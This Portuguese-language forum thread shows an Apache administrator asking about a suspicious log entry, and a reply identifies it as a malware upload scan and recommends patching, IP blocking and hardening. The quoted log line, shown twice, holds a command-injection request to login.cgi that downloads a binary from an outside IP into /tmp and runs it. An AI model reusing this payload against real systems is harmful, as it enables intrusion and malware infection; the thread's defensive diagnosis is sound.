Pular para o conteúdo
Apache Web Server em Servidores

Log suspeito no apache! [RESOLVIDO]

Responder tópico
  • Denunciar
  • Indicar

1. Log suspeito no apache! [RESOLVIDO]

Enviado em 23/07/2018 - 03:57h

Alguém ai sabe oque pode ser isso aqui?
118.83.9.179 - - [23/Jul/2018:03:30:43 -0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$ HTTP/1.1" 400 0 "-" "-"
acabei de encontrar no log do meu apache.

Responder tópico

2. Re: Log suspeito no apache! [RESOLVIDO]

Melhor resposta

Enviado em 23/07/2018 - 08:46h

recscreen123 escreveu:

Alguém ai sabe oque pode ser isso aqui?
118.83.9.179 - - [23/Jul/2018:03:30:43 -0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$ HTTP/1.1" 400 0 "-" "-"
acabei de encontrar no log do meu apache.
Escaneamento verificando se é possivel fazer upload de algum malware e executar no seu servidor, pode ser um "shellshock atack". Aqui tem uma matéria em inglês demonstrando o ataque:

http://rajsadayeshellshock.blogspot.com/2016/11/shellshock-attack-using-metasploit.html

Atualize pacotes, bloqueie o IP e faça "hardening" do sistema.
E o aplicativo "lynis" citado na matéria acima é bastante útil.

https://www.tecmint.com/apache-security-tips/

Responder tópico

Responder tópico

Entre na sua conta para responder.

Fazer login para responder